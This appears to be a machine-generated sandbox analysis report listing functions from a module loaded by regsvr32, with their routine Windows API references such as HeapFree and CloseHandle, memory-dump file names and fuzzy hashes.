Instruction Fuzzy Hash: 22319125A0EEC2E5E7708F25D8583F827B0EB547C8F44A032D90D86794CF3EE5419341

Function 00007FF8A9325A01 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F
memcpy.MSVCRT ref: 00007FF8A9326133
HeapFree.KERNEL32 ref: 00007FF8A9326144

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 4202d426624c05b5481c714ff2566854147ff5ad8f2ff3ef7743bf150e926248
Instruction ID: 8a5ea35922b56a15e56334a8f95637456a94045cc178c4f820e7560a729f98ff
Opcode Fuzzy Hash: 4202d426624c05b5481c714ff2566854147ff5ad8f2ff3ef7743bf150e926248
Instruction Fuzzy Hash: FA216D2590EEC2E4FB249F2584683F82371EF557E8F44A232D92E866D4CE3DE545A341

Function 00007FF8A930807C Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA
HeapFree.KERNEL32 ref: 00007FF8A930809F

Part of subcall function 00007FF8A93019F0: HeapFree.KERNEL32 ref: 00007FF8A9301A2D

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A9354147

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$abort$CaptureContextExceptionRaiseUnwind
String ID:
API String ID: 1327955162-0
Opcode ID: 5892259aef27dbb5a292326611d28530ac7f55136ad951a08d068180019d1f7f
Instruction ID: 00a65c9d99f200c74a3bfa7013b75fb38c583f4c03c1b9479315379368aba99d
Opcode Fuzzy Hash: 5892259aef27dbb5a292326611d28530ac7f55136ad951a08d068180019d1f7f
Instruction Fuzzy Hash: B8212C1190EEC2A0F624EF96A4583FE5271FF847C0F442175DA4ECAADACF7DD0408640

Function 00007FF8A93252CA Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f9ce4ba5cf43efaee98ba4d1215b8f7eac5ba93627644fcbed06328eaa90a573
Instruction ID: 969e69e6a9077f6747680a22c5b73c4401bf81d592a4a30baa1b78dba49c3cee
Opcode Fuzzy Hash: f9ce4ba5cf43efaee98ba4d1215b8f7eac5ba93627644fcbed06328eaa90a573
Instruction Fuzzy Hash: 1A21282590FEC2E8E7649F2598983F823B0EB597C8F446036D90D8A699CE3EE545A341

Function 00007FF8A932515C Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e4e5007bf3e68d20a92d55b07ddf980c58e14553e6c91346be46602ca8e63213
Instruction ID: 58132515846f39304c3684b01e47a60a4c400e17a1be5b19af6add86e11275fe
Opcode Fuzzy Hash: e4e5007bf3e68d20a92d55b07ddf980c58e14553e6c91346be46602ca8e63213
Instruction Fuzzy Hash: 07217F2590FEC2E8F7B49F2598943F823B0EB547C8F546032D90DCA694CE3DE541A301

Function 00007FF8A932545F Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1c59e3edae4415c1090eac1fa2cd51cb337f691613abb89c0ffa58d220f2a141
Instruction ID: 87c9a6000b409621d4712a5ab641c67598e7f89636c971ac2643290ef95f5d5a
Opcode Fuzzy Hash: 1c59e3edae4415c1090eac1fa2cd51cb337f691613abb89c0ffa58d220f2a141
Instruction Fuzzy Hash: 3D214F2590FEC2E8F7749F2598943F823B0EB557C8F546032D90DCA694CE3EE545A341

Function 00007FF8A93253DC Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 092f30c392a24da3c60fc7f4ee9fff4746986268c5b1a00d372f712165d85b1c
Instruction ID: 912811988eb1cbb11a508280cdc88118747e556f665077f610007aa533e317e0
Opcode Fuzzy Hash: 092f30c392a24da3c60fc7f4ee9fff4746986268c5b1a00d372f712165d85b1c
Instruction Fuzzy Hash: D0213B2590FEC2E8F7649F2598583F823B0EB557C8F446032D90DCA694CF3EE545A341

Function 00007FF8A9325433 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1c2ae8970281d2d152e4d4da2a23ed301540d0ee8637ead7c383296c4cc442cb
Instruction ID: 34321f37e7d46ec5d79c4fc8b13722a90b3b74ee917337fcbaf29412cdee13ca
Opcode Fuzzy Hash: 1c2ae8970281d2d152e4d4da2a23ed301540d0ee8637ead7c383296c4cc442cb
Instruction Fuzzy Hash: F2211B2590EEC2E8E7649F25D8983F823B0EB597C8F446032D90D8A695CF3EE545A341

Function 00007FF8A93254B6 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7a6af4161f14224653f8133faf9d74ddbccae0216a60aff6938acf1d44f8271d
Instruction ID: 3b83eb6adae39b93e08e747d37a5229697390ec1cd48d896b18aace06ffb5641
Opcode Fuzzy Hash: 7a6af4161f14224653f8133faf9d74ddbccae0216a60aff6938acf1d44f8271d
Instruction Fuzzy Hash: 08212C2590FEC2E8E7649F25D8983F823B4EB597C8F546032D90DCA794CE3EE545A341

Function 00007FF8A9325949 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9325F3A
HeapFree.KERNEL32 ref: 00007FF8A9325F53
HeapFree.KERNEL32 ref: 00007FF8A9325F6C
HeapFree.KERNEL32 ref: 00007FF8A9325F8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9f277537636735aada9a51d2360e07bdd4599c25415202eaed14db3b8186863e
Instruction ID: c75a42e155725682978e45ab7d7a8b907cf5535508510a2b07fb757b2f8cfac9
Opcode Fuzzy Hash: 9f277537636735aada9a51d2360e07bdd4599c25415202eaed14db3b8186863e
Instruction Fuzzy Hash: 4E21BA2590EEC2E4EB249F2588A83F923B1EF95BD8F44A132D91D866D4CE3DE141A301

Function 00007FF8A9307E45 Relevance: 5.0, APIs: 4, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2f27702dc60d2f0512b04bf1bc3bce9a573af3ca80652dff5945a24905800ee0
Instruction ID: aceb83d36fddeab65e4971a72d37d79460408dc0fee08bf3dd7705fa79738c8f
Opcode Fuzzy Hash: 2f27702dc60d2f0512b04bf1bc3bce9a573af3ca80652dff5945a24905800ee0
Instruction Fuzzy Hash: 4D214A1190EEC2A0F670EF5594183FA66B1EF88784F4460B1D64ECAA9ACF7EE4409601

Function 00007FF8A9307E47 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8e9988840aa1e6ee7b288039242b90d9082cbe6af18d6761f91f634dac2ba325
Instruction ID: b2ed10748d8135fa45481687296febe48cfc18a1f7c61f019bca2ed8c874834b
Opcode Fuzzy Hash: 8e9988840aa1e6ee7b288039242b90d9082cbe6af18d6761f91f634dac2ba325
Instruction Fuzzy Hash: 62114C11D0EEC2A0F620EF9694583FA6671EFC87C4F4460B1D64ECAADACE7EE0009601

Function 00007FF8A9307FA7 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308441
HeapFree.KERNEL32 ref: 00007FF8A930846C
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0566187213d73907f5599e2d82ba6da10116f16a301e606f0204d7fd81f9f647
Instruction ID: 242bb034356dc1c078f0451f88f7e9f43f2d110b868e7f156990f2dc700fc9d9
Opcode Fuzzy Hash: 0566187213d73907f5599e2d82ba6da10116f16a301e606f0204d7fd81f9f647
Instruction Fuzzy Hash: D2113D21D0EDC2A0FA64EF5694143FA62B1EFC87C4F446072DA4ECAAD6CF7ED4449201

Function 00007FF8A9308381 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A931C480: HeapFree.KERNEL32 ref: 00007FF8A931C49B

Part of subcall function 00007FF8A931AEB0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8A931AA8B), ref: 00007FF8A931AF53

Part of subcall function 00007FF8A9301A60: HeapFree.KERNEL32 ref: 00007FF8A9301AA1
Part of subcall function 00007FF8A9301A60: HeapFree.KERNEL32 ref: 00007FF8A9301AB9

HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 35e56fb1f82ee45a8ec0be6c85e314330f8d63024748e9c6f04f0cba8ef3ace2
Instruction ID: 839f12eb02b9e13ffdb70cc151651959ebab6f11fdd36f5089b8986f59b48179
Opcode Fuzzy Hash: 35e56fb1f82ee45a8ec0be6c85e314330f8d63024748e9c6f04f0cba8ef3ace2
Instruction Fuzzy Hash: 23112B2190EDC2A0EA20EF96D4553FA6771FFC87C4F446072D64ECAAEACE6DE4448640

Function 00007FF8A93086BC Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A931AEB0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8A931AA8B), ref: 00007FF8A931AF53

Part of subcall function 00007FF8A9301A60: HeapFree.KERNEL32 ref: 00007FF8A9301AA1
Part of subcall function 00007FF8A9301A60: HeapFree.KERNEL32 ref: 00007FF8A9301AB9

HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 6f1c778b1043ce5c4515c719b8439a79ac6796909c3a36f3e2584c820f6bdc7c
Instruction ID: 68d2b46169471899c64899409f89a4a6dbd7f82f575e5a59817938aac9aa27f5
Opcode Fuzzy Hash: 6f1c778b1043ce5c4515c719b8439a79ac6796909c3a36f3e2584c820f6bdc7c
Instruction Fuzzy Hash: 4F114C1190EDC6A0EA60EF96D4593FA62B1FFC87C0F846071E64EC66EACE7DE440C600

Function 00007FF8A9308035 Relevance: 5.0, APIs: 4, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301A60: HeapFree.KERNEL32 ref: 00007FF8A9301AA1
Part of subcall function 00007FF8A9301A60: HeapFree.KERNEL32 ref: 00007FF8A9301AB9

HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
